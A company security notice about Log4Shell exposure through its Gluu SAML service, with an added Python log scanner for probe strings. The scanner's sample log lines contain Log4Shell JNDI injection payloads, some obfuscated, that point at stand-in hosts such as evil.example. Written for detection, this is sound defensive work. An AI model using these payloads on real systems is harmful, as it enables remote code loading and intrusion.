Last updated 11 January 2022
The OpenSesame team has examined our platform for any instances of vulnerable versions of Log4j, the Apache logging library. The vulnerability (CVE-2021-44228), also known as "Log4Shell," was publicly disclosed by Apache on 9 December 2021.
The few OpenSesame accounts that log in with SAML authentication do so through Gluu, the service that handles our SAML routing. Gluu uses a vulnerable version of Log4j; details of our investigation and the actions we took appear below.
No other OpenSesame accounts use services potentially affected by the Log4j vulnerability.
Gluu risk mitigation
Again, please note that only accounts using SAML authentication would use Gluu.
On Monday morning, 13 December 2021, we updated our Web Application Firewall (WAF) rules and have confirmed that they are blocking attackers seeking to exploit the Log4Shell vulnerability. WAF rules of this kind block known forms of the exploit string and are a stopgap, not a fix; the steps below address the underlying component.
We have seen no indication of a breach or intrusion: neither our Endpoint Protection System (Sophos) nor our Intrusion Detection System (Threatstack) has registered any alerts platform-wide.
Out of an abundance of caution, we rotated out the Gluu EC2 server instances that were in service before our firewall change. We have inspected them and confirmed that they were never compromised.
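The WAF change above blocks exploit strings at the edge, and the same pattern logic is what you would run over request logs when confirming, as the paragraph above does, that nothing got through. The following is an added example, not OpenSesame's WAF rule set or Gluu's code: it normalizes the common obfuscations (URL-encoding, ${lower:..}/${upper:..} wrappers, ${x:-y} default-value tricks) before looking for the ${jndi:<scheme>:...} lookup that triggers the vulnerability. The log lines are constructed, using documentation IP ranges and example domains.

```python
"""Hunt for Log4Shell (CVE-2021-44228) probe strings in web-request log lines.

Added example; this is not OpenSesame's WAF rule set or detection logic.
"""
import re
import urllib.parse

# Schemes the JNDI lookup can resolve through; ldap and rmi are the ones seen in the wild.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns|iiop|corba|nds|nis|http)\s*:",
    re.I,
)
# ${lower:X} / ${upper:X} -> X, innermost (no nested ${...}) first.
_CASE_WRAP = re.compile(r"\$\{\s*(?:lower|upper)\s*:([^${}]*)\}", re.I)
# ${anything:-X} -> X, the default-value form, e.g. ${env:NO_SUCH:-j} or ${::-j}.
_DEFAULT_WRAP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize(text: str, max_rounds: int = 3) -> str:
    """Undo the obfuscations so the JNDI lookup becomes visible."""
    for _ in range(max_rounds):           # repeated URL-encoding is common
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    previous = None
    while previous != text:               # peel wrappers until nothing changes
        previous = text
        text = _CASE_WRAP.sub(r"\1", text)
        text = _DEFAULT_WRAP.sub(r"\1", text)
    return text


def jndi_scheme(line: str):
    """Return the JNDI scheme of a probe ('ldap', 'rmi', ...) or None if the line is clean."""
    match = _JNDI.search(normalize(line))
    return match.group("scheme").lower() if match else None


def scan(lines):
    """Return [(line_number, scheme)] for every line that carries a probe."""
    hits = []
    for number, line in enumerate(lines, start=1):
        scheme = jndi_scheme(line)
        if scheme:
            hits.append((number, scheme))
    return hits


# Constructed sample access-log lines (documentation IPs, example domains); not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Dec/2021:08:01:12 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - [13/Dec/2021:08:01:13 +0000] "GET /idp/saml HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:r}mi://203.0.113.9:1099/x}"',
    '10.0.0.7 - - [13/Dec/2021:08:01:14 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.net%2Fa%7D HTTP/1.1" 404 "-" "curl/7.79"',
    '10.0.0.8 - - [13/Dec/2021:08:01:15 +0000] "GET /login HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:08:01:16 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NO_SUCH:-j}ndi:ldaps://evil.example/a}"',
]

if __name__ == "__main__":
    for number, scheme in scan(SAMPLE_LOG):
        print(f"line {number}: JNDI probe via {scheme}")
```

Two caveats apply to any matcher of this kind. The lookup syntax admits many more encodings than the ones normalized here, so a clean scan of access logs is evidence, not proof; and the vulnerability fires on any string the application logs, including fields that never reach the access log. That is why the rotation of the instances and the removal of Gluu described on this page matter more than the WAF rule.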
We are now working to remove and replace Gluu.
This article will be updated when that process is complete.
If you have further questions, our Support team is here to help via email at email@example.com or via live chat and phone. Feel free to reach us at (503) 808-1268, ext. 2, or at +44 203 744 5541 in Europe.